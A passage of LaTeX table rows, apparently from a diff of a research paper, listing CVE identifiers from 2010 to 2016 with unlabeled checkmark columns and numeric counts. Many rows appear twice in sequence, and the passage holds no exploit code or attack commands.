/checkmark & & & & & & /checkmark & 1 & 194 & & \\ \midrule +CVE-2015-2068 & & & & & & /checkmark & /checkmark & & /checkmark & & /checkmark & & & & & & 7 & 56 & 60 & 56 \\ \midrule +CVE-2015-2156 & /checkmark & & & & & & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 82 & & \\ \midrule +CVE-2015-2296 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & & 1 & 112 & & \\ \midrule +CVE-2015-2912 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & /checkmark & & & 1 & 162 & & \\ \midrule +CVE-2015-2913 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 122 & & \\ \midrule +CVE-2015-3010 & /checkmark & & & & & & & /checkmark & & /checkmark & & & & /checkmark & & & 1 & 142 & & \\ \midrule +CVE-2015-3195 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & /checkmark & & /checkmark & 1 & 196 & & \\ \midrule +CVE-2015-3196 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & /checkmark & 1 & 126 & & \\ \midrule +CVE-2015-3220 & /checkmark & & & & & & & & & & & & & & & & 1 & 96 & & \\ \midrule +CVE-2015-3253 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 126 & & \\ \midrule +CVE-2015-4053 & & & & & & & & /checkmark & & /checkmark & & & & /checkmark & & & 1 & 110 & & \\ \midrule +CVE-2015-4082 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 134 & & \\ \midrule +CVE-2015-4412 & /checkmark & & & & & /checkmark & /checkmark & & & & & & & & & & 1 & 112 & & \\ \midrule +CVE-2015-4619 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & & 1 & 104 & & \\ \midrule +CVE-2015-4706 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & & 1 & 80 & & \\ \midrule +CVE-2015-5081 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 102 & & \\ \midrule +CVE-2015-5147 & /checkmark & & & & & & & & & & & & & & & & 1 & 64 & & \\ \midrule +CVE-2015-5159 & /checkmark & & & & & & & & & & & & & & & & 1 & 160 & & \\ \midrule +CVE-2015-5211 & & & & & & & /checkmark & /checkmark & /checkmark & & & & & & & /checkmark & 1 & 54 & & \\ \midrule +CVE-2015-5253 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 130 & & \\ \midrule +CVE-2015-5254 & /checkmark & & & & & & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 148 & & \\ \midrule +CVE-2015-5607 & /checkmark & & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & 1 & 116 & & \\ \midrule +CVE-2015-6748 & /checkmark & & & & & & & & & & & /checkmark & & /checkmark & & & 1 & 102 & & \\ \midrule +CVE-2015-7294 & /checkmark & & & & & /checkmark & & /checkmark & & & /checkmark & & & /checkmark & & & 1 & 150 & & \\ \midrule +CVE-2015-7314 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & & & & 1 & 104 & & \\ \midrule +CVE-2015-7316 & /checkmark & & & & & & & & & & & & & /checkmark & & & 1 & 98 & & \\ \midrule +CVE-2015-7559 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 156 & & \\ \midrule +CVE-2015-7809 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 124 & & \\ \midrule +CVE-2015-8213 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 126 & & \\ \midrule +CVE-2015-8309 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & & & & 1 & 168 & & \\ \midrule +CVE-2015-8310 & /checkmark & & & & & & & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 108 & & \\ \midrule +CVE-2015-8747 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & & 1 & 104 & & \\ \midrule +CVE-2015-8748 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 134 & & \\ \midrule +CVE-2015-8814 & /checkmark & & & & & & /checkmark & & /checkmark & /checkmark & & & & & & & 1 & 112 & & \\ \midrule +CVE-2015-8968 & /checkmark & & & & & & & & & & & & & /checkmark & & & 1 & 130 & & \\ \midrule +CVE-2015-9235 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & & & & 1 & 104 & & \\ \midrule +CVE-2015-9243 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & /checkmark & & & 1 & 154 & & \\ \midrule +CVE-2015-9251 & /checkmark & & & & & & /checkmark & /checkmark & & & /checkmark & /checkmark & & /checkmark & & /checkmark & 1 & 156 & & \\ \midrule +CVE-2016-0750 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & & 1 & 72 & & \\ \midrule +CVE-2010-0684 & & & & & & /checkmark & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & 1 & 66 & & \\ \midrule +CVE-2010-2245 & & & & & & & /checkmark & /checkmark & /checkmark & & & & & & & & 3 & 22 & 104 & 50 \\ \midrule +CVE-2010-5312 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & /checkmark & & & 1 & 134 & & \\ \midrule +CVE-2011-1772 & & & & & & /checkmark & & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & 1 & 94 & & \\ \midrule +CVE-2011-1950 & & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & /checkmark & & & 1 & 58 & & \\ \midrule +CVE-2011-2732 & & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & /checkmark & 1 & 54 & & \\ \midrule +CVE-2011-3871 & & & & & & & & & & /checkmark & & & & /checkmark & & /checkmark & 1 & 104 & & \\ \midrule +CVE-2011-4104 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & & & & & & /checkmark & 1 & 118 & & \\ \midrule +CVE-2011-4461 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & & & & 1 & 104 & & \\ \midrule +CVE-2011-4838 & /checkmark & & & & & & & & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 174 & & \\ \midrule +CVE-2011-5036 & /checkmark & & & & & & & & & /checkmark & & & & & & /checkmark & 1 & 102 & & \\ \midrule +CVE-2012-1109 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 70 & & \\ \midrule +CVE-2012-1176 & /checkmark & & & & & & /checkmark & /checkmark & & /checkmark & & & & /checkmark & & & 1 & 150 & & \\ \midrule +CVE-2012-2139 & /checkmark & & & & & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 122 & & \\ \midrule +CVE-2012-2417 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & /checkmark & & & 1 & 122 & & \\ \midrule +CVE-2012-3366 & /checkmark & & & & & & & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 108 & & \\ \midrule +CVE-2012-3408 & /checkmark & & & & & /checkmark & & & /checkmark & & & & & & & & 1 & 108 & & \\ \midrule +CVE-2012-3458 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 124 & & \\ \midrule +CVE-2012-3865 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 130 & & \\ \midrule +CVE-2012-4386 & & & & & & & & & /checkmark & /checkmark & & & & & & & 1 & 74 & & \\ \midrule +CVE-2012-4387 & & & & & & & /checkmark & & /checkmark & /checkmark & & & & & & & 1 & 82 & & \\ \midrule +CVE-2012-4520 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & /checkmark & & & & & /checkmark & 1 & 122 & & \\ \midrule +CVE-2012-5812 & & & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & 1 & 52 & & \\ \midrule +CVE-2012-6550 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & 1 & 132 & & \\ \midrule +CVE-2012-6662 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & /checkmark & & & 1 & 134 & & \\ \midrule +CVE-2012-6684 & & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 124 & & \\ \midrule +CVE-2012-6685 & /checkmark & & & & & & & & & & & /checkmark & & /checkmark & & & 1 & 134 & & \\ \midrule +CVE-2013-0256 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & 1 & 192 & & \\ \midrule +CVE-2013-0262 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 178 & & \\ \midrule +CVE-2013-0263 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 170 & & \\ \midrule +CVE-2013-0294 & /checkmark & & & & & /checkmark & & & & & & & & & & & 1 & 104 & & \\ \midrule +CVE-2013-1607 & & & & & & & & & & & & & & & & & 3 & 32 & 34 & 32 \\ \midrule +CVE-2013-1801 & /checkmark & & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & 1 & 112 & & \\ \midrule +CVE-2013-1812 & /checkmark & & & & & & & /checkmark & & /checkmark & & /checkmark & & /checkmark & & & 1 & 146 & & \\ \midrule +CVE-2013-1879 & & & & & & /checkmark & & & & /checkmark & /checkmark & & & & & & 1 & 82 & & \\ \midrule +CVE-2013-1880 & & & & & & /checkmark & & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 86 & & \\ \midrule +CVE-2013-2013 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & /checkmark & & & 1 & 106 & & \\ \midrule +CVE-2013-2035 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & & 1 & 84 & & \\ \midrule +CVE-2013-2132 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & /checkmark & 1 & 126 & & \\ \midrule +CVE-2013-2191 & /checkmark & & & & & & & /checkmark & & /checkmark & & & & & & & 1 & 172 & & \\ \midrule +CVE-2013-3300 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 122 & & \\ \midrule +CVE-2013-4002 & & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 2 & 34 & 46 & 46 \\ \midrule +CVE-2013-4111 & & & & & & & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & & 1 & 56 & & \\ \midrule +CVE-2013-4116 & /checkmark & & & & & & & & & /checkmark & & /checkmark & & /checkmark & & & 1 & 138 & & \\ \midrule +CVE-2013-4249 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 126 & & \\ \midrule +CVE-2013-4353 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & & 1 & 188 & & \\ \midrule +CVE-2013-4413 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & /checkmark & & & /checkmark & & & 1 & 118 & & \\ \midrule +CVE-2013-4477 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & /checkmark & & /checkmark & 1 & 132 & & \\ \midrule +CVE-2013-4562 & /checkmark & & & & & & & /checkmark & & /checkmark & & & & & & & 1 & 108 & & \\ \midrule +CVE-2013-4701 & /checkmark & & & & & & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & & 1 & 120 & & \\ \midrule +CVE-2013-5093 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 126 & & \\ \midrule +CVE-2013-5123 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 102 & & \\ \midrule +CVE-2013-6044 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 126 & & \\ \midrule +CVE-2013-6348 & & & & & & /checkmark & & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & 1 & 94 & & \\ \midrule +CVE-2013-6429 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 130 & & \\ \midrule +CVE-2013-6430 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 130 & & \\ \midrule +CVE-2013-6465 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 122 & & \\ \midrule +CVE-2013-7370 & /checkmark & & & & & & & & & & & & & & & & 1 & 96 & & \\ \midrule +CVE-2013-7397 & /checkmark & & & & & & /checkmark & & & /checkmark & & & & /checkmark & & /checkmark & 1 & 144 & & \\ \midrule +CVE-2013-7398 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & /checkmark & & & 1 & 154 & & \\ \midrule +CVE-2013-7459 & /checkmark & & & & & & /checkmark & & & /checkmark & & & & & & & 1 & 108 & & \\ \midrule +CVE-2014-0012 & /checkmark & & & & & & /checkmark & & & & /checkmark & & & & & & 2 & 108 & 138 & 138 \\ \midrule +CVE-2014-0072 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & & 1 & 124 & & \\ \midrule +CVE-2014-0073 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & & 1 & 112 & & \\ \midrule +CVE-2014-0110 & /checkmark & & & & & & & & & /checkmark & & & & & & /checkmark & 1 & 102 & & \\ \midrule +CVE-2014-0120 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & & 1 & 120 & & \\ \midrule +CVE-2014-0121 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 124 & & \\ \midrule +CVE-2014-0177 & /checkmark & & & & & /checkmark & & & & /checkmark & & & & & & & 1 & 172 & & \\ \midrule +CVE-2014-0193 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 130 & & \\ \midrule +CVE-2014-0225 & /checkmark & & & & & & /checkmark & /checkmark & & /checkmark & & & & & & /checkmark & 1 & 118 & & \\ \midrule +CVE-2014-1202 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & & 1 & 96 & & \\ \midrule +CVE-2014-1402 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & 2 & 124 & 150 & 150 \\ \midrule +CVE-2014-1403 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & & 1 & 180 & & \\ \midrule +CVE-2014-1604 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & & 1 & 112 & & \\ \midrule +CVE-2014-1830 & /checkmark & & & & & & /checkmark & & & /checkmark & & & & & & & 1 & 108 & & \\ \midrule +CVE-2014-1832 & /checkmark & & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & 1 & 112 & & \\ \midrule +CVE-2014-1858 & /checkmark & & & & & & & & & & /checkmark & & & /checkmark & & & 1 & 134 & & \\ \midrule +CVE-2014-1859 & /checkmark & & & & & & & & & & /checkmark & & & /checkmark & & & 1 & 134 & & \\ \midrule +CVE-2014-1869 & /checkmark & & & & & & /checkmark & & & & /checkmark & & & & & /checkmark & 1 & 110 & & \\ \midrule +CVE-2014-1904 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & & 1 & 128 & & \\ \midrule +CVE-2014-1932 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & /checkmark & & /checkmark & 1 & 124 & & \\ \midrule +CVE-2014-1933 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & /checkmark & & /checkmark & 1 & 116 & & \\ \midrule +CVE-2014-2053 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & 1 & 192 & & \\ \midrule +CVE-2014-2235 & /checkmark & & & & & /checkmark & & & /checkmark & & /checkmark & & & & & & 1 & 112 & & \\ \midrule +CVE-2014-2525 & & & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & 1 & 56 & & \\ \midrule +CVE-2014-3007 & /checkmark & & & & & /checkmark & & /checkmark & /checkmark & & & & & /checkmark & & /checkmark & 1 & 120 & & \\ \midrule +CVE-2014-3488 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & & 1 & 128 & & \\ \midrule +CVE-2014-3506 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & /checkmark & 1 & 190 & & \\ \midrule +CVE-2014-3511 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & & & & & & /checkmark & 1 & 182 & & \\ \midrule +CVE-2014-3576 & & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & & 1 & 52 & & \\ \midrule +CVE-2014-3578 & /checkmark & & & & & & & & & & & & & & & /checkmark & 1 & 66 & & \\ \midrule +CVE-2014-3579 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & & 1 & 146 & & \\ \midrule +CVE-2014-3599 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 70 & & \\ \midrule +CVE-2014-3600 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & & 1 & 138 & & \\ \midrule +CVE-2014-3625 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 106 & & \\ \midrule +CVE-2014-3741 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & /checkmark & & & & & & 1 & 120 & & \\ \midrule +CVE-2014-3995 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 134 & & \\ \midrule +CVE-2014-4658 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 106 & & \\ \midrule +CVE-2014-6394 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 134 & & \\ \midrule +CVE-2014-7143 & & & & & & & /checkmark & & /checkmark & & & & & & & & 2 & 44 & 46 & 46 \\ \midrule +CVE-2014-7192 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & /checkmark & & & & & & 1 & 120 & & \\ \midrule +CVE-2014-7193 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & /checkmark & & & 1 & 106 & & \\ \midrule +CVE-2014-7202 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & /checkmark & & & 3 & 138 & 150 & 142 \\ \midrule +CVE-2014-7203 & /checkmark & & & & & & & & & /checkmark & & /checkmark & & /checkmark & & & 1 & 138 & & \\ \midrule +CVE-2014-7205 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & & & & & & & 1 & 116 & & \\ \midrule +CVE-2014-8115 & /checkmark & & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & 1 & 80 & & \\ \midrule +CVE-2014-8176 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & & & & /checkmark & & /checkmark & 1 & 120 & & \\ \midrule +CVE-2014-8650 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 102 & & \\ \midrule +CVE-2014-8681 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & & 1 & 116 & & \\ \midrule +CVE-2014-8682 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & & & 1 & 124 & & \\ \midrule +CVE-2014-8991 & /checkmark & & & & & & & & & & /checkmark & & & /checkmark & & & 1 & 134 & & \\ \midrule +CVE-2014-9130 & /checkmark & & & & & /checkmark & & /checkmark & & /checkmark & & & & & & & 1 & 116 & & \\ \midrule +CVE-2014-9682 & /checkmark & & & & & /checkmark & /checkmark & & & & & & & & & & 1 & 112 & & \\ \midrule +CVE-2014-9720 & /checkmark & & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & 1 & 116 & & \\ \midrule +CVE-2014-9721 & /checkmark & & & & & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & 2 & 142 & 154 & 154 \\ \midrule +CVE-2014-10068 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 134 & & \\ \midrule +CVE-2014-10077 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 134 & & \\ \midrule +CVE-2015-0206 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & /checkmark & 1 & 194 & & \\ \midrule +CVE-2015-0209 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & /checkmark & 1 & 182 & & \\ \midrule +CVE-2015-0288 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & /checkmark & & /checkmark & 1 & 188 & & \\ \midrule +CVE-2015-0838 & & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 124 & & \\ \midrule +CVE-2015-0846 & /checkmark & & & & & & /checkmark & & & /checkmark & & & & & & & 1 & 108 & & \\ \midrule +CVE-2015-1326 & /checkmark & & & & & & /checkmark & & & /checkmark & /checkmark & & & /checkmark & & & 1 & 178 & & \\ \midrule +CVE-2015-1782 & & & & & & & /checkmark & & & /checkmark & & & & & & & 1 & 108 & & \\ \midrule +CVE-2015-1788 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 186 & & \\ \midrule +CVE-2015-1791 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & & /checkmark & & /checkmark & 1 & 192 & & \\ \midrule +CVE-2015-1792 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 194 & & \\ \midrule +CVE-2015-2068 & & & & & & /checkmark & /checkmark & & /checkmark & & /checkmark & & & & & & 7 & 56 & 60 & 56 \\ \midrule +CVE-2015-2156 & /checkmark & & & & & & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 82 & & \\ \midrule +CVE-2015-2296 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & & 1 & 112 & & \\ \midrule +CVE-2015-2912 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & /checkmark & & & 1 & 162 & & \\ \midrule +CVE-2015-2913 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 122 & & \\ \midrule +CVE-2015-3010 & /checkmark & & & & & & & /checkmark & & /checkmark & & & & /checkmark & & & 1 & 142 & & \\ \midrule +CVE-2015-3195 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & /checkmark & & /checkmark & 1 & 196 & & \\ \midrule +CVE-2015-3196 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & /checkmark & 1 & 126 & & \\ \midrule +CVE-2015-3220 & /checkmark & & & & & & & & & & & & & & & & 1 & 96 & & \\ \midrule +CVE-2015-3253 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 126 & & \\ \midrule +CVE-2015-4053 & & & & & & & & /checkmark & & /checkmark & & & & /checkmark & & & 1 & 110 & & \\ \midrule +CVE-2015-4082 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 134 & & \\ \midrule +CVE-2015-4412 & /checkmark & & & & & /checkmark & /checkmark & & & & & & & & & & 1 & 112 & & \\ \midrule +CVE-2015-4619 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & & 1 & 104 & & \\ \midrule +CVE-2015-4706 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & & 1 & 80 & & \\ \midrule +CVE-2015-5081 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 102 & & \\ \midrule +CVE-2015-5147 & /checkmark & & & & & & & & & & & & & & & & 1 & 64 & & \\ \midrule +CVE-2015-5159 & /checkmark & & & & & & & & & & & & & & & & 1 & 160 & & \\ \midrule +CVE-2015-5211 & & & & & & & /checkmark & /checkmark & /checkmark & & & & & & & /checkmark & 1 & 54 & & \\ \midrule +CVE-2015-5253 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 130 & & \\ \midrule +CVE-2015-5254 & /checkmark & & & & & & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 148 & & \\ \midrule +CVE-2015-5607 & /checkmark & & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & 1 & 116 & & \\ \midrule +CVE-2015-6748 & /checkmark & & & & & & & & & & & /checkmark & & /checkmark & & & 1 & 102 & & \\ \midrule +CVE-2015-7294 & /checkmark & & & & & /checkmark & & /checkmark & & & /checkmark & & & /checkmark & & & 1 & 150 & & \\ \midrule +CVE-2015-7314 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & & & & 1 & 104 & & \\ \midrule +CVE-2015-7316 & /checkmark & & & & & & & & & & & & & /checkmark & & & 1 & 98 & & \\ \midrule +CVE-2015-7559 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 156 & & \\ \midrule +CVE-2015-7809 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 124 & & \\ \midrule +CVE-2015-8213 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 126 & & \\ \midrule +CVE-2015-8309 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & & & & 1 & 168 & & \\ \midrule +CVE-2015-8310 & /checkmark & & & & & & & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 108 & & \\ \midrule +CVE-2015-8747 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & & 1 & 104 & & \\ \midrule +CVE-2015-8748 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 134 & & \\ \midrule +CVE-2015-8814 & /checkmark & & & & & & /checkmark & & /checkmark & /checkmark & & & & & & & 1 & 112 & & \\ \midrule +CVE-2015-8968 & /checkmark & & & & & & & & & & & & & /checkmark & & & 1 & 130 & & \\ \midrule +CVE-2015-9235 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & & & & 1 & 104 & & \\ \midrule +CVE-2015-9243 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & /checkmark & & & 1 & 154 & & \\ \midrule +CVE-2015-9251 & /checkmark & & & & & & /checkmark & /checkmark & & & /checkmark & /checkmark & & /checkmark & & /checkmark & 1 & 156 & & \\ \midrule +CVE-2016-0750 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & & 1 & 72 & & \\ \midrule +CVE-2010-0684 & & & & & & /checkmark & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & 1 & 66 & & \\ \midrule +CVE-2010-2245 & & & & & & & /checkmark & /checkmark & /checkmark & & & & & & & & 3 & 22 & 104 & 50 \\ \midrule +CVE-2010-5312 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & /checkmark & & & 1 & 134 & & \\ \midrule +CVE-2011-1772 & & & & & & /checkmark & & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & 1 & 94 & & \\ \midrule +CVE-2011-1950 & & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & /checkmark & & & 1 & 58 & & \\ \midrule +CVE-2011-2732 & & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & /checkmark & 1 & 54 & & \\ \midrule +CVE-2011-3871 & & & & & & & & & & /checkmark & & & & /checkmark & & /checkmark & 1 & 104 & & \\ \midrule +CVE-2011-4104 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & & & & & & /checkmark & 1 & 118 & & \\ \midrule +CVE-2011-4461 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & & & & 1 & 104 & & \\ \midrule +CVE-2011-4838 & /checkmark & & & & & & & & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 174 & & \\ \midrule +CVE-2011-5036 & /checkmark & & & & & & & & & /checkmark & & & & & & /checkmark & 1 & 102 & & \\ \midrule +CVE-2012-1109 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 70 & & \\ \midrule +CVE-2012-1176 & /checkmark & & & & & & /checkmark & /checkmark & & /checkmark & & & & /checkmark & & & 1 & 150 & & \\ \midrule +CVE-2012-2139 & /checkmark & & & & & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 122 & & \\ \midrule +CVE-2012-2417 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & /checkmark & & & 1 & 122 & & \\ \midrule +CVE-2012-3366 & /checkmark & & & & & & & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 108 & & \\ \midrule +CVE-2012-3408 & /checkmark & & & & & /checkmark & & & /checkmark & & & & & & & & 1 & 108 & & \\ \midrule +CVE-2012-3458 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 124 & & \\ \midrule +CVE-2012-3865 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 130 & & \\ \midrule +CVE-2012-4386 & & & & & & & & & /checkmark & /checkmark & & & & & & & 1 & 74 & & 